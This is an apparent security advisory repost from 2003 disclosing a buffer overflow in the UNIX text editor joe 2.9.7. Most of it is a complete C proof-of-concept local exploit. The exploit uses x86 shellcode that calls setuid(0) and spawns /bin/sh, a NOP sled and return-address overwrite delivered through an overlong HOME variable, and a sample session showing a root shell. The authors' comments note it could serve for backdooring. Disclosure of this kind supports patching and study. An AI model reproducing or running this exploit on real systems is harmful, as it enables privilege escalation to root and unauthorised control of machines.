|
|
|
|
| |
| There exists a buffer overflow vulnerability in the popular UNIX/Linux terminal text editor "joe". As far as it is known version 2.9.7 is affected by the vulnerability. The following is a proof of concept local exploit tested on Slackware [kernel 2.4.20] only. |
| |
Credit:
The information has been provided by dodo and tsunami.
|
| |
Exploit:
/*
Linux x86 "joe" local exploit
author: dodo <dodo@darkwired.org>
author: tsunami <tsunami@darkwired.org>
tested on: Slackware Linux (2.4.20), `joe` 'version 2.9.7'
date: 30-07-2003 updated: 01-08-03
notes:
could be used for backdooring purposes..
greets to everyone @ #darkwired
root@comprak:/dodo/edu/joe# chmod a+s /usr/bin/joe
dodo@comprak:/dodo/edu/joe$ ./dw-bof-joe -2000
sh-2.05b# id
uid=0(root) gid=10(wheel) groups=10(wheel)
usage:
./dw-bof-joe [offset]
Slackware Linux offset: -2000
contact:
http://www.darkwired.org/
ssl-irc: irc.darkwired.org #darkwired
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BSIZE 1016
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
"\x80\xe8\xe4\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x58";
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
char buffer[BSIZE+32];
unsigned long sp = get_sp(), i;
signed long offset = -2000;
if(argc>1) offset = atoi(argv[1]);
sp = sp - offset;
memset(buffer, 0x90, sizeof(buffer)); //glijbaan
memcpy(buffer+(BSIZE-strlen(shellcode)), (char *)&shellcode, strlen(shellcode));
//memcpy(buffer+BSIZE+12, &sp, sizeof(sp));
for(i=BSIZE;i<BSIZE+32;i+=4)
{
*(long *)&buffer[i] = sp;
}
memset(buffer+BSIZE+32, 0x0, 1);
if(setenv("HOME", buffer, 1)==-1) return -1;
system("joe");
return 1;
}
|
|
|
|
|
